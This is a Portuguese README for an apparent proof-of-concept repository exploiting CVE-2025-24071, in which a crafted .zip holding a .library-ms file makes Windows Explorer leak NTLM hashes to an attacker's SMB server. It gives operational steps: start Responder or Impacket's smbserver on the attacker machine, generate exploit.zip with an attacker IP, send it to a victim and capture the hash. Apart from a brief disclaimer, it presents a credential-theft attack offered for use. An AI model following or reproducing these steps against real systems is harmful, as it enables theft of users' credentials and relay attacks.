
Este é um script PoC em Python para a CVE-2025-24071, que é uma vulnerabilidade no Explorador de Arquivos do Windows que permite acesso não autorizado a informações confidenciais, como exposição NTLM.
CVE-2025-24071 é uma vulnerabilidade no Windows File Explorer que permite a divulgação não autorizada de hashes NTLM. Quando um usuário extrai um arquivo .zip cuidadosamente criado contendo um arquivo .library-ms malicioso, o Windows Explorer analisa automaticamente o arquivo e inicia uma requisição de autenticação SMB para um servidor controlado pelo atacante, vazando o hash NTLM da vítima sem qualquer interação adicional do usuário.
.library-ms malicioso apontando para seu servidor SMB.zip.library-mshttps://github.com/user-attachments/assets/e71ea7f7-c739-46f1-9e91-1f3b13b21596
Nota: Se o vídeo não tocar embutido, baixe o
PoC.mp4deste repositório.
smbserver.py do Impacket)Clone o repositório
git clone https://github.com/yourusername/CVE-2025-24071.git
cd CVE-2025-24071
Inicie seu ouvinte SMB (na máquina do atacante)
# Usando Responder
sudo responder -I eth0
# Ou usando Impacket
sudo python3 smbserver.py -smb2support fakeShare /tmp/share
Gere o exploit
python exploit.py
Digite o IP do atacante quando solicitado
Envie exploit.zip para o alvo
Capture o hash NTLM quando a vítima extrair o arquivo
CVE-2025-24071/
├── exploit.py # Gerador de PoC do exploit
├── PoC.mp4 # Demonstração em vídeo
└── README.md # Documentação
Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.
Nyx0r-PoC
Este projeto é apenas para fins educacionais. Use com responsabilidade.
⭐ Dê uma estrela neste repositório se achou útil!
| Propriedade | Valor |
|---|
| CVE ID | CVE-2025-24071 |
| Tipo | Divulgação de Hash NTLM / Vazamento de Informação |
| Vetor de Ataque | Local (requer que o usuário extraia o ZIP) |
| Interação do Usuário | Mínima (apenas extrair o arquivo) |
| Impacto | Roubo de credenciais NTLM, potenciais ataques de relay |